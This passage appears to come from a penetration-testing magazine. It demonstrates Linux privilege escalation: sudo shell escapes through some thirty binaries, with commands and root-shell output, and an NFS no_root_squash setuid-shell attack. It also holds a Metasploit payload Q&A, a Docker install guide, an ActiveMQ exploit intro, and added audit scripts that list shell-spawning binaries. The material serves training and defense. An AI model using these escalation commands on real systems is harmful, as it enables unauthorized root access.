uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ CMD="/bin/sh"
[armour@my_privilege html]$ sudo php -r "system('$CMD');"
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
39. vim

vim is the improved vi editor; its :! command runs a shell command.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo vim -c ':!/bin/sh'
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
40. vi

vi is the classic visual editor; like vim, its :! command runs a shell command.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo vi -c ':!/bin/sh' /dev/null
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
42. tar

tar stands for tape archive. It is used to create and extract archives; its checkpoint actions can execute a command while archiving.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
43. rpm

RPM (Red Hat Package Manager) is the default package management utility for Red Hat systems. Its --eval option evaluates macros, and a %{lua:...} macro can run a command.

[armour@my_privilege html]$ sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
44. expect

The expect command is used to automate providing input to programs that expect interactive input.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo expect -c 'spawn /bin/sh;interact'
spawn /bin/sh
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
45. find

The find command, as its name implies, is used to find files on a Unix system, like Search in Windows; its -exec action runs a command for each match.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo find . -exec /bin/sh \; -quit
[root@my_privilege html]# id
uid=0(root) gid=0(root) groups=0(root)
46. less

The less command is used to view a large file one page at a time; at its prompt, ! runs a shell command.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo less /etc/profile
!/bin/sh
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
47. more

The more command is used to view large files with scrolling; like less, it accepts ! to run a shell command. Clearing TERM keeps it from using the whole screen.

[armour@my_privilege html]$ TERM= sudo more /etc/profile
# /etc/profile

# System wide environment and startup programs, for login setup
# Functions and aliases go in /etc/bashrc

# It's NOT a good idea to change this file unless you know what you
# are doing. It's much better to create a custom.sh shell script in
# /etc/profile.d/ to make custom changes to your environment, as this
# will prevent the need for merging in future updates.

pathmunge () {
    case ":${PATH}:" in
        *:"$1":*)
            ;;
        *)
            if [ "$2" = "after" ] ; then
...
--More--(33%) !/bin/sh
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
48. python

Python, as our readers know, is a programming language; os.system() runs a shell command.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo python -c 'import os; os.system("/bin/sh")'
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
50. script

The script command is used to record all terminal activity; it starts a shell to do so.

[armour@my_privilege man]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege man]$ sudo script -q /dev/null
[root@my_privilege man]# id
uid=0(root) gid=0(root) groups=0(root)
51. busybox

BusyBox, popularly known as the Swiss army knife of embedded Linux, provides several UNIX utilities in one single executable, including a shell.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo busybox sh
[root@my_privilege html]# id
uid=0(root) gid=0(root) groups=0(root)
52. nmap

Older versions of Nmap have an interactive mode; this target has Nmap 5.21. Its interactive prompt did not accept the command we typed, because the shell escape in interactive mode is !sh (an exclamation mark), not :sh.

[armour@my_privilege man]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege man]$ sudo nmap --interactive
Starting Nmap V. 5.21 ( http://nmap.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> :sh
Unknown command (:sh) -- press h for help
54. easy_install

easy_install is a package installer for Python. On modern systems it is replaced by pip. Like pip, it runs the package's setup.py, here as root.

[armour@my_privilege html]$ TF=$(mktemp -d)
[armour@my_privilege html]$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
[armour@my_privilege html]$ sudo easy_install $TF
Processing tmp.bbn0dFm1EU
Writing /tmp/tmp.bbn0dFm1EU/setup.cfg
Running setup.py -q bdist_egg --dist-dir /tmp/tmp.bbn0dFm1EU/egg-dist-tmp-...
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
55. facter

The facter command shows current system information such as hardware details, network settings and kernel information. It loads custom facts written in Ruby from the directory named in FACTERLIB, so a fact file of ours runs as root.

[armour@my_privilege ~]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege ~]$ TF=$(mktemp -d)
[armour@my_privilege ~]$ echo 'exec("/bin/sh")' > $TF/x.rb
[armour@my_privilege ~]$ sudo FACTERLIB=$TF facter
The ZFS modules are not loaded
The ZFS modules are not loaded
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
56. flock

flock manages file locks from shell scripts and can run a command while holding a lock.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo flock -u / /bin/sh
[root@my_privilege html]# id
uid=0(root) gid=0(root) groups=0(root)
57. gdb

gdb, the GNU debugger we have used in our previous issues, has a shell escape in its ! command.

[armour@my_privilege html]$ id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ sudo gdb -nx -ex '!sh' -ex quit
GNU gdb (GDB) ...
...
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
58. ionice
The ionice command sets or gets the I/O scheduling class and priority for a program. The program it is given is started by ionice, so under sudo it runs as root.

[armour@my privilege html]$ id
id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my privilege html]$ sudo ionice /bin/sh
sudo ionice /bin/sh
sh-4.2# id
id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2#
59. irb
irb is the interactive Ruby shell. Ruby's exec replaces the interpreter with the program named, which inherits root under sudo.

[armour@my privilege html]$ id
id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my privilege html]$ sudo irb
sudo irb
irb(main):001:0> exec '/bin/bash'
exec '/bin/bash'
[root@my privilege html]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@my privilege html]#
60. jjs
jjs is the Nashorn JavaScript interpreter shipped with Java. It interprets one or more JavaScript files, and scripts can reach Java classes such as java.lang.Runtime, which can execute commands.

[armour@my privilege html]$ id
id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my privilege html]$ echo "Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c \$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)').waitFor()" | sudo jjs
jjs> sh-4.2# id
id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2#
61. journalctl
The journalctl command views the logs collected by systemd's journal. It shows them through a pager (less), and the pager's ! command runs a shell command, which under sudo runs as root.

[armour@my privilege html]$ sudo journalctl
sudo journalctl
WARNING: terminal is not fully functional
-  (press RETURN)!/bin/sh
sh-4.2# id
id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2#
62. logsave
The logsave command runs a command line program with the specified arguments and saves its output to a log file. The program runs as root under sudo.

[armour@my privilege html]$ id
id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my privilege html]$ sudo logsave /dev/null /bin/sh -i
sudo logsave /dev/null /bin/sh -i
[root@my privilege html]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@my privilege html]#
63. ltrace
ltrace runs the specified command and records all the dynamic library calls it makes. The traced command inherits root under sudo.

[armour@my privilege html]$ id
id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my privilege html]$ sudo ltrace -b -L /bin/sh
sudo ltrace -b -L /bin/sh
sh-4.2# id
id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2#
64. lua
Lua is a lightweight, embeddable scripting language. Its os.execute runs a shell command, which under sudo runs as root.

[armour@my privilege html]$ id
id
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my privilege html]$ sudo lua -e 'os.execute("/bin/sh")'
sudo lua -e 'os.execute("/bin/sh")'
sh-4.2# id
id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2#
[armour@my privilege html]$ COMMAND=
(the rest of this entry is not legible in the source)
sh-4.2# id
id
uid=0(root) gid=0(root) groups=0(root)
These are the methods by which sudo privileges on programs or commands can be exploited to gain root privileges. The common thread is that sudo lets the user run a program which can in turn start something else, be it a pager, an interpreter, a debugger or a package installer, and that child inherits root. Any such program in a sudoers rule, with or without NOPASSWD, is equivalent to granting a root shell. However, this is not the only way to escalate privileges. Before we go on to the other ways, let's execute the PE.sh script whose permissions we earlier modified using our sudo privileges.
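As an added example (not from the magazine, and not part of PE.sh), the following POSIX shell script reads the output of sudo -l and flags the rules that hand out a root shell through the programs covered above. The sudo -l text embedded in it is a constructed sample, not a capture from the target, and the list SHELL_SPAWNERS is limited to the binaries discussed on this page; extend it from GTFOBins for a real audit.

```shell
#!/bin/sh
# Added example: flag sudoers entries that amount to a root shell.
# Input is the text of "sudo -l"; the sample below is constructed.

# Binaries from the list above that spawn a shell or run a command as root.
SHELL_SPAWNERS="easy_install facter flock gdb ionice irb jjs journalctl logsave ltrace lua nmap"

# Constructed sample of "sudo -l" output (not captured from the target).
SAMPLE_SUDO_L='Matching Defaults entries for armour on my:
    !visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME"

User armour may run the following commands on my:
    (root) NOPASSWD: /usr/bin/gdb, /usr/bin/journalctl
    (root) /usr/bin/ltrace -b -L /bin/sh, /bin/ls
    (ALL : ALL) ALL'

# audit_sudo_l TEXT: print "<runas>|<tag>|<command>|<finding>" for every
# command spec that yields a root shell. Handles comma-separated command
# lists, the NOPASSWD tag and the catch-all ALL.
audit_sudo_l() {
    printf '%s\n' "$1" | awk -v spawners="$SHELL_SPAWNERS" '
        BEGIN { n = split(spawners, s, " "); for (i = 1; i <= n; i++) known[s[i]] = 1 }
        /^[ \t]*\(/ {
            line = $0; sub(/^[ \t]*/, "", line)
            runas = line; sub(/\).*/, ")", runas)            # "(root)" or "(ALL : ALL)"
            rest = line; sub(/^[^)]*\)[ \t]*/, "", rest)     # text after the runas spec
            tag = "PASSWD"
            if (rest ~ /^NOPASSWD:/) { tag = "NOPASSWD"; sub(/^NOPASSWD:[ \t]*/, "", rest) }
            n = split(rest, cmds, /,[ \t]*/)
            for (i = 1; i <= n; i++) {
                cmd = cmds[i]
                if (cmd == "ALL") { print runas "|" tag "|ALL|unrestricted"; continue }
                split(cmd, parts, /[ \t]+/)
                base = parts[1]; sub(/.*\//, "", base)      # /usr/bin/gdb -> gdb
                if (base in known) print runas "|" tag "|" cmd "|spawns shell"
            }
        }'
}

# count_findings TEXT: number of risky entries, handy for a pass/fail check.
count_findings() {
    audit_sudo_l "$1" | wc -l | tr -d ' '
}

# On a real host: audit_sudo_l "$(sudo -n -l 2>/dev/null)"
audit_sudo_l "$SAMPLE_SUDO_L"
```

On a real host feed it sudo -n -l so it never blocks on a password prompt. The fix on the defending side is to remove such programs from sudoers, or to wrap the needed operation in a script that exposes no shell escape; sudo's noexec option also blocks further exec() calls from dynamically linked programs, which defeats most of the tricks listed above.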
As already mentioned, PE.sh is a new Linux privilege escalation enumeration tool, similar to LinEnum, that helps in finding ways to escalate privileges. Our readers already had a glimpse of it in the Jan 2020 Issue, where it detected the DirtyCow vulnerability in the Vulnuni 1.0.1 CTF. Let's run it and feed its output to a file named PE.txt.
[armour@my privilege html]$ ./PE.sh > PE.txt
[armour@my privilege html]$ ls
PE.sh  PE.txt  Reports  passwordfiles.txt

PE.sh creates two separate outputs, a directory named Reports and a file named passwordfiles.txt, which hold information about the system and any captured passwords respectively. We will look at those two later. Now let us see the output of the script in PE.txt. The first information it shows is the kernel, hostname, system architecture and OS information.

[armour@my privilege html]$ cat PE.txt
Kernel : 3.10.0-[...]
Hostname : [...]
Architecture : [...]
OS : [...]
B. Kernel exploits

Exploiting vulnerabilities in the kernel is another important way of gaining root privileges. The problem with this method is that we rarely find vulnerable kernels. Our readers have seen a kernel exploit recently in the Lampiao : 1 CTF challenge (HackercoolMag July 2018 Issue) and the Vulnuni : 1.0.1 CTF challenge (HackercoolMag Jan 2020 Issue). The vulnerability in both of these instances was DirtyCow. That's how rare they are.
Even if you find a kernel vulnerability, we suggest using such exploits sparingly. Just because we have a kernel exploit ready doesn't mean it works reliably. The DirtyCow exploit worked for us perfectly on the Lampiao : 1 CTF machine but not on the VulnUni : 1.01 CTF machine, where it almost crashed the system. Sometimes it may crash the system altogether even if you get root. As for this particular kernel, searchsploit lists only denial-of-service entries for its version, so there is no ready privilege escalation exploit. Note also that searchsploit matches on the version string alone: a distribution kernel such as 3.10.0 on CentOS carries backported fixes, so always compare the full uname -r and the vendor's patch level before trusting a hit.
$ searchsploit 3.10.0
--------------------------------------------------------------------------- -------------------------------
 Exploit Title                                                             |  Path
                                                                           | (/usr/share/exploitdb/)
--------------------------------------------------------------------------- -------------------------------
Linux Kernel [...] - Denial of Service                                     | exploits/linux/dos/39542.txt
Linux Kernel [...] (CentOS 7) - Denial of Service                          | exploits/linux/dos/41350.c
Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - Denial of Service          | exploits/linux/dos/39556.txt
Linux Kernel [...] 4.8.0-22/ [...]                                         | [...]
(further entries not legible in the source; all are denial-of-service entries)
Let's scroll down the PE.txt file.

Kernel protections:
  GCC stack protector support : [...]
  Strict user copy checks     : [...]
Programming languages and compilers found:
  perl
  python
  [...]

Here we have more information about the kernel. Did you notice the GCC stack protector? It is the compiler feature (stack canaries) that detects stack buffer overflows at run time by placing a guard value before the saved return address and aborting the program if it has been overwritten; it only catches that one class of memory corruption (ok, that was an easter egg). We can also see the programming languages present on the target system. This gives us an idea of which language to use when writing an exploit, in case we happen to find a vulnerability. PE.sh also specifically checks for the DirtyCow vulnerability, as shown below.
DirtyCow check : [...]
Password policy (/etc/login.defs):
  PASS_MIN_DAYS 0
  [...]
Check passwordfiles.txt for possible scripts that have passwords
Home directory discovering:
  [...]

It also lists the contents of some directories such as the root directory, the user's home directory and the /var directory. These are all stored in a separate directory named "Reports", while the files that may contain passwords are listed in a file named passwordfiles.txt, as shown below.
[armour@my privilege html]$ cat passwordfiles.txt
[...]
/etc/pki/tls/misc/CA
[...]
(remaining paths not legible in the source)
Here is the Reports directory with more information.

[armour@my privilege html]$ ls Reports
[...]
Network information (from Reports):
  Gateway IPs : 192.168.[...]
  ARP table : [...]
  Listening ports and connections :
    [...] 192.168.36.130:[...] ESTABLISHED
    [...] 192.168.36.130:[...] ESTABLISHED

The PE.sh script also provides network information about the target, as shown above. As part of this, we can also see the other systems connected to our target through its ARP table. We can also see the connections on the target system. The highlighted connections are the ones we established after exploiting it. From the port numbers the target is listening on, we get an idea of which services are running, although in this case we had already done an nmap scan.
C. Exploiting applications running with root privileges

Even when the kernel has no usable vulnerability, we have a chance of privilege escalation if an application runs with root privileges. There are three applications of interest here: SSH, MySQL and NFS. Let's see if any of them is running as root. The ps aux command, filtered with grep, can be used as shown below; the first column is the owner of each process.

[armour@my privilege html]$ ps aux | grep ssh
[armour@my privilege html]$ ps aux | grep mysql
[armour@my privilege html]$ ps aux | grep nfs
(output not legible in the source)

Here two applications, SSH and NFS, are running as root. Exploiting SSH would need a password, so let's try NFS. From the attacker system we use the showmount command to list the shares the target exports, and mount to mount one of them.
$ showmount -e 192.168.36.142
Export list for 192.168.36.142:
[...]
$ mkdir /tmp/nfs3
$ sudo mount -t nfs 192.168.36.142:/tmp /tmp/nfs3
mount.nfs: access denied by server while mounting 192.168.36.142:/tmp
That failed. But all hope is not lost yet. There is a file of interest to us on the target system: /etc/exports. This file is the table of local file systems that the NFS server makes accessible to NFS clients (in this case our attacker system), and with which options. Normally its contents are maintained only by the server's system administrator (root).
When we check the permissions of this file, we see that although it is owned by root its mode is 777, which means anybody can read, write or execute it. So we edit /etc/exports ourselves and add a share entry of our own (the author uses the home folder of the user "armour"), exported with the no_root_squash option, as shown below; the walkthrough then goes on to mount the /tmp export.
[armour@my privilege html]$ cat /etc/exports
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
[armour@my privilege html]$ ls -l /etc/exports
-rwxrwxrwx 1 root root 57 Mar 14 04:36 /etc/exports
[armour@my privilege html]$ cat /etc/exports
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
bash-4.2$
Now, let's restart the NFS server for the changes to take effect. This needs root privileges, hence we use sudo.

bash-4.2$ sudo systemctl restart nfs-server
bash-4.2$
Then, on the attacker system, we run the same commands we ran earlier, and this time we succeed in mounting the share onto our system.

$ showmount -e 192.168.36.142
Export list for 192.168.36.142:
[...]
$ mkdir /tmp/nfs3
$ sudo mount -t nfs 192.168.36.142:/tmp /tmp/nfs3
$ ls -l /tmp/nfs3
[...]
Then we move to the mounted directory /tmp/nfs3, copy the bash binary into the mount as shown below and set the setuid bit on it with chmod +s. The first chmod, done as our unprivileged user, is refused. Because the export has no_root_squash, uid 0 on our attacker machine is also uid 0 on the share, so repeating the chmod with sudo succeeds. Keep in mind that a setuid bit only grants the uid of the file's owner: the copy must also be owned by root on the share (a sudo chown root bash on the mount does that, again thanks to no_root_squash) before it can give a root shell on the target.

$ cd /tmp/nfs3
$ cp /bin/bash .
$ chmod +s bash
chmod: changing permissions of 'bash': Operation not permitted
$ ls -l
-rwxr-xr-x 1 1001 1001 1168776 May  5 22:43 bash
$ sudo chmod +s bash
In the /etc/exports file there is an option called no_root_squash. root_squash is the default NFS safeguard: requests arriving from uid 0 on a client are mapped to the anonymous user (nobody) on the server, so a client that is root cannot create root-owned or setuid-root files on the share. no_root_squash turns that mapping off. That is exactly what this privilege escalation relies on.

Now, on the target system, we move to the /home folder and execute the bash command as shown below.
It didn't work; we got an error. But no need to worry. Remember that at the beginning of this guide we told you there are different types of shells. Let's use one of them, dash, copied to the share and given the setuid bit in the same way.

[armour@my privilege ~]$ cd /home
[armour@my privilege home]$ ls -l
-rwsr-sr-x 1 root root [...] dash
[armour@my privilege home]$ ./dash

Two things commonly break the bash step. A bash binary copied from the attacker's distribution may need a newer glibc than the target has, which fails with a loader error. And even when it runs, bash resets the effective uid to the real uid when the two differ unless it is started with -p, so a setuid-root bash started without -p silently gives back an unprivileged shell. Copying the target's own /bin/bash onto the share and running it as ./bash -p avoids both problems; dash does not drop privileges, which is why it works here.
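The two conditions that made this escalation possible, a world-writable /etc/exports and an export with no_root_squash, are easy to audit. The following POSIX shell script is an added example, not part of the magazine and not part of PE.sh: it reads an exports table (a constructed sample is embedded so it runs offline), reports the risky options, emits a hardened copy with root_squash restored and the insecure option dropped, and checks an octal file mode for group/other write bits. Function names and the sample content are this example's own, not anything from the target.

```shell
#!/bin/sh
# Added example: audit an NFS exports table for the weaknesses used above.
# The exports text below is a constructed sample, not the real file.

SAMPLE_EXPORTS='# constructed sample of /etc/exports (not from the article)
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/share 192.168.36.0/24(ro,sync,root_squash)
/home/armour *(rw,no_root_squash)'

# audit_exports TEXT: print "<path>|<client>|<finding>" for each weak setting.
#   no_root_squash  - uid 0 on the client is uid 0 on the export (setuid-root files possible)
#   insecure        - requests from ports above 1023 are accepted, so any user on a
#                     client host can speak NFS without being root there
#   wildcard client - exported to every host that can reach the server
audit_exports() {
    printf '%s\n' "$1" | awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }
        {
            path = $1
            for (i = 2; i <= NF; i++) {
                client = $i; sub(/\(.*/, "", client)
                opts = ""
                if (index($i, "(") > 0) { opts = $i; sub(/^[^(]*\(/, "", opts); sub(/\).*/, "", opts) }
                if (opts ~ /(^|,)no_root_squash(,|$)/) print path "|" client "|no_root_squash"
                if (opts ~ /(^|,)insecure(,|$)/)       print path "|" client "|insecure"
                if (client == "*")                     print path "|" client "|wildcard client"
            }
        }'
}

# harden_exports TEXT: the same table with root_squash restored and the
# insecure option dropped. Client lists are left for the admin to narrow.
harden_exports() {
    printf '%s\n' "$1" | sed \
        -e 's/no_root_squash/root_squash/g' \
        -e 's/(insecure,/(/g' -e 's/,insecure,/,/g' -e 's/,insecure)/)/g'
}

# mode_writable_by_others MODE: 0 if an octal mode string such as 777 (what
# "stat -c %a /etc/exports" prints) grants write to group or other, which is
# what let the unprivileged user above rewrite the export table.
mode_writable_by_others() {
    len=${#1}
    g=$(printf '%s' "$1" | cut -c "$((len - 1))")
    o=$(printf '%s' "$1" | cut -c "$len")
    [ $((g & 2)) -ne 0 ] || [ $((o & 2)) -ne 0 ]
}

audit_exports "$SAMPLE_EXPORTS"
harden_exports "$SAMPLE_EXPORTS"
```

On a live server run audit_exports "$(cat /etc/exports)" and mode_writable_by_others "$(stat -c %a /etc/exports)"; after correcting the file, exportfs -ra reloads the table without restarting the service. Narrowing the wildcard client to specific hosts or subnets is a policy decision, so the script reports it but leaves it to the administrator.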
(To Be Continued)
Q: While using Metasploit, most of the time you use a reverse_tcp payload and only a few times you use a bind_tcp payload. What is the difference between them?
A: Good question. A bind_tcp payload opens a listening port on the target machine and waits for the attacker to connect to it. The problem is that almost all firewalls are configured to allow inbound connections only on a few regularly used ports (for example 80 and 443), so the connection to the newly opened port is blocked and the exploit fails. In a reverse_tcp payload the connection is initiated from the target machine back to the attacker. Outbound connections are filtered far less often, and the attacker can even listen on a port such as 443 that outbound rules usually allow, so there is much less chance of it being blocked by a firewall. The only requirement is a listener on the attacker system to receive the incoming connection.
Q: While using Metasploit payloads, they are being easily detected as malware by antivirus. It is the same with msfvenom payloads. What is the use of Metasploit if payloads can easily be detected?
A: Metasploit is the penetration testing tool used by pentesters as a standard. For creating harder-to-detect payloads, Metasploit has encoding and encryption features that alter the bytes of the payload. But since Metasploit has been in the field for a long time, antivirus vendors have signatures for its payloads, stagers and encoders, so signature detection picks Metasploit payloads up easily. Penetration testers therefore use other means to build and deliver payloads (Donut, recently, for example).
However, Metasploit is still the standard tool of penetration testing because, apart from payloads, it has many exploit modules and a lot of other functionality that really proves handy for penetration testers.
INSTALLIT
Hello readers. As you all know, the first Kali Linux release of this year, Kali Linux 2020.1, came out in January. It brought many changes, such as no longer using the root user by default, and some new tools. Since we use many Docker containers in our penetration testing tutorials, we thought of bringing you a how-to on installing Docker in Kali Linux 2020.1. Note that the Docker packages used here are built for the 64-bit (amd64) architecture, so first make sure your system is 64-bit with the command shown below.

hackercoolmagz@kali:~$ uname -a
Linux kali 5.5.0-kali1-amd64 #1 SMP [...] x86_64 GNU/Linux
hackercoolmagz@kali:~$
Here are the commands to install Docker on Kali Linux 2020.1. First import Docker's repository signing key, then add Docker's Debian repository to an apt source list (the exact repository line used is not legible in the source), update the package lists and remove any older Docker packages.

hackercoolmagz@kali:~$ curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -
OK
hackercoolmagz@kali:~$ [add the Docker Debian repository to /etc/apt/sources.list.d/]
hackercoolmagz@kali:~$ sudo apt-get update
Get:1 http://ftp.harukasan.org/kali kali-rolling InRelease [30.5 kB]
[...]
Get:5 http://ftp.harukasan.org/kali kali-rolling/non-free amd64 Packages [198 kB]
[...]
Fetched 16.7 MB in 23s (738 kB/s)
Reading package lists... Done
hackercoolmagz@kali:~$ sudo apt-get remove docker docker-engine docker.io
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package 'docker-engine' is not installed, so not removed
[...]
hackercoolmagz@kali:~$
hackercoolmagz@kali:~$ sudo apt-get install docker-ce
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
  [...] linux-compiler-gcc-9-x86 linux-headers-5.5.0-kali1-amd64
  linux-headers-5.5.0-kali1-common linux-headers-amd64 linux-kbuild-5.5 pigz
Suggested packages:
  aufs-dev menu
The following NEW packages will be installed:
  [...] linux-compiler-gcc-9-x86 linux-headers-5.5.0-kali1-amd64
  linux-headers-5.5.0-kali1-common linux-headers-amd64 linux-kbuild-5.5 pigz
[...]
After this operation, 446 MB of additional disk space will be used.
Do you want to continue? [Y/n]
After Docker is successfully installed (it will take some time), run the following command to test whether it is actually working: sudo docker run hello-world

hackercoolmagz@kali:~$ sudo docker run hello-world
Unable to find image 'hello-world:latest' locally
latest: Pulling from library/hello-world
[...]
Status: Downloaded newer image for hello-world:latest

Hello from Docker!
This message shows that your installation appears to be working correctly.

To generate this message, Docker took the following steps:
 1. The Docker client contacted the Docker daemon.
 2. The Docker daemon pulled the "hello-world" image from the Docker Hub.
    (amd64)
[...]

Docker should work now. To have the Docker service start automatically after booting the system, use the command shown below.

hackercoolmagz@kali:~$ [command not legible in the source]
hackercoolmagz@kali:~$
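The steps above collected into one script, as an added example that is not part of the magazine: it refuses to run on anything but an amd64 host, pins Docker's repository signing key by fingerprint before trusting the repository, writes the apt source to its own file with a signed-by keyring instead of the apt-key add used above, and enables the service at boot. Assumptions that are not in the original: the Debian codename "buster" for Docker's repository (Kali has no Docker repository of its own), the keyring path, the fingerprint taken from Docker's install documentation, and the constructed gpg output used for the offline demonstration.

```shell
#!/bin/sh
# Added example: the Docker-on-Kali steps above as one script, with the
# checks a cautious admin adds. Assumptions (not from the magazine): the
# Debian codename used for Docker's repository, the signed-by keyring path,
# and the pinned key fingerprint taken from Docker's install documentation.

DOCKER_GPG_URL="https://download.docker.com/linux/debian/gpg"
DOCKER_KEY_FPR="9DC858229FC7DD38854AE2D88D81803C0EBFCD88"   # assumed current
DOCKER_KEYRING="/usr/share/keyrings/docker.gpg"
DEBIAN_CODENAME="${DEBIAN_CODENAME:-buster}"                # assumption

# is_supported_arch MACHINE: 0 when "uname -m" reports an amd64 host, which is
# what the Debian packages used here are built for.
is_supported_arch() { [ "$1" = "x86_64" ]; }

# docker_apt_source CODENAME: the apt line for Docker's Debian stable channel,
# restricted to amd64 and to packages signed by the pinned keyring.
docker_apt_source() {
    printf 'deb [arch=amd64 signed-by=%s] https://download.docker.com/linux/debian %s stable\n' \
        "$DOCKER_KEYRING" "$1"
}

# key_fingerprint_ok GPG_COLONS: 0 when the primary key fingerprint in the
# output of "gpg --show-keys --with-colons --with-fingerprint FILE" matches
# the pinned value. Field 10 of the first "fpr" record is the primary key.
key_fingerprint_ok() {
    fpr=$(printf '%s\n' "$1" | awk -F: '$1 == "fpr" { print $10; exit }')
    [ "$fpr" = "$DOCKER_KEY_FPR" ]
}

# Constructed gpg --with-colons output for the demonstration (the subkey
# line and its fingerprint are made up; only the primary fingerprint counts).
SAMPLE_GPG_COLONS='pub:-:4096:1:8D81803C0EBFCD88:1487788586:::-:::scESC::::::23::0:
fpr:::::::::9DC858229FC7DD38854AE2D88D81803C0EBFCD88:
uid:-::::1487788586::0:Docker Release (CE deb) <docker@docker.com>::::::::::0:
sub:-:4096:1:1111111111111111:1487788586::::::s::::::23:
fpr:::::::::1111111111111111111111111111111111111111:'

install_docker() {
    is_supported_arch "$(uname -m)" || { echo "unsupported architecture: $(uname -m)" >&2; return 1; }
    keyfile=$(mktemp)
    curl -fsSL "$DOCKER_GPG_URL" -o "$keyfile"
    if ! key_fingerprint_ok "$(gpg --show-keys --with-colons --with-fingerprint "$keyfile")"; then
        echo "Docker signing key fingerprint mismatch, refusing to add repository" >&2
        rm -f "$keyfile"; return 1
    fi
    gpg --dearmor < "$keyfile" | sudo tee "$DOCKER_KEYRING" >/dev/null
    rm -f "$keyfile"
    docker_apt_source "$DEBIAN_CODENAME" | sudo tee /etc/apt/sources.list.d/docker.list >/dev/null
    sudo apt-get update
    sudo apt-get remove -y docker docker-engine docker.io
    sudo apt-get install -y docker-ce
    sudo systemctl enable --now docker     # start now and on every boot
    sudo docker run hello-world
}

# The install only runs when asked, so the file can be sourced for its checks.
if [ "${RUN_DOCKER_INSTALL:-0}" = 1 ]; then
    install_docker
fi
```

Run it as RUN_DOCKER_INSTALL=1 sh install-docker.sh. The fingerprint pin is the point of the script: a repository key fetched over HTTPS is only as trustworthy as the TLS connection and the mirror, and comparing it against a value taken from a second source (the vendor's documentation) before it goes into the keyring is the check that apt-key add alone does not give you.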
More information about managing Docker images and containers was given in our Feb 2019 Issue. Please refer to that Issue.

METASPLOIT THIS MONTH
Welcome to this month's Metasploit This Month feature. We are ready with the latest exploit modules of Metasploit.

Apache ActiveMQ Directory Traversal Upload Module

Apache ActiveMQ is, according to its makers, "the most popular open source, multi-protocol, Java-based messaging server". Although it is built to run on many operating systems, this vulnerability can only be exploited on Windows: ActiveMQ 5.x before 5.11.2 on Windows has a directory traversal vulnerability (CVE-2015-1830) in its fileserver upload feature that can be exploited to upload a malicious payload to the target.
This module uploads a Java-based (JSP) payload, as the software itself is Java based. Let's test this exploit module. We have tested it on Apache ActiveMQ 5.11.1 installed on Windows 10. Readers can download the software from our repository.
Start Metasploit and load the apache_activemq_traversal_upload module as shown below. Apache ActiveMQ runs with default credentials (admin : admin) and, by default, listens on port 8161.
msf5 > use exploit/windows/http/apache_activemq_traversal_upload
msf5 exploit(windows/http/apache_activemq_traversal_upload) > show options

